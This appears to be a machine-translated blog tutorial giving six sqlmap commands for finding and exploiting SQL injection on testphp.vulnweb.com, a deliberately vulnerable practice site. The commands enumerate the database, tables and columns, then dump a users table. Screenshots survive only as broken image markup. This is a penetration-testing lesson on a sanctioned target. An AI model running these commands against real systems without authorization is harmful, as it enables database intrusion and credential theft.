1, build Python 2.7.X and SQLMAP environment;
2, using Web scanning tools (such as ZAP, etc.) to find the possible injection point of sql: "Http://testphp.vulnweb.com/artists.php?artist=1";
3. Use Sqlmap to get the current database name
Sqlmap.py-u "Http://testphp.vulnweb.com/artists.php?artist=1"--current-db
The results of the operation are as follows: 650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/47/B0/wKioL1P-AO2DO2XPAAJGUp-vATk381.jpg "title= "Qq20140826235520.png" alt= "Wkiol1p-ao2do2xpaajgup-vatk381.jpg"/>
4. Use Sqlmap list name
Sqlmap.py-u "Http://testphp.vulnweb.com/artists.php?artist=1"--table-d Acuart
The results of the operation are as follows:
650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M01/47/B0/wKioL1P-AceQvJtaAANn-y5MlLc705.jpg "title=" Qq20140826235928.png "alt=" Wkiol1p-aceqvjtaaann-y5mllc705.jpg "/>
5. Use sqlmap column field name
Sqlmap.py-u "Http://testphp.vulnweb.com/artists.php?artist=1"--columns-t users-d acuart-v 0
The results of the operation are as follows:
650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M02/47/B0/wKioL1P-AoCAg6fzAAJQvEsP7E0525.jpg "title=" Qq20140827000243.png "alt=" Wkiol1p-aocag6fzaajqvesp7e0525.jpg "/>
6. Get field content using Sqlmap
Sqlmap.py-u "Http://testphp.vulnweb.com/artists.php?artist=1"--dump-t users-d acuart-v 0
The results of the operation are as follows:
650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/47/B0/wKioL1P-BkKA-a4vAAM5LLU5mg4809.jpg "title=" Qq20140827001842.png "alt=" Wkiol1p-bkka-a4vaam5llu5mg4809.jpg "/>
This article is from the SOA security blog, so be sure to keep this source http://dannyqiu.blog.51cto.com/344039/1545942
Six steps to utilize Sqlmap (testphp.vulnweb.com as test target drone)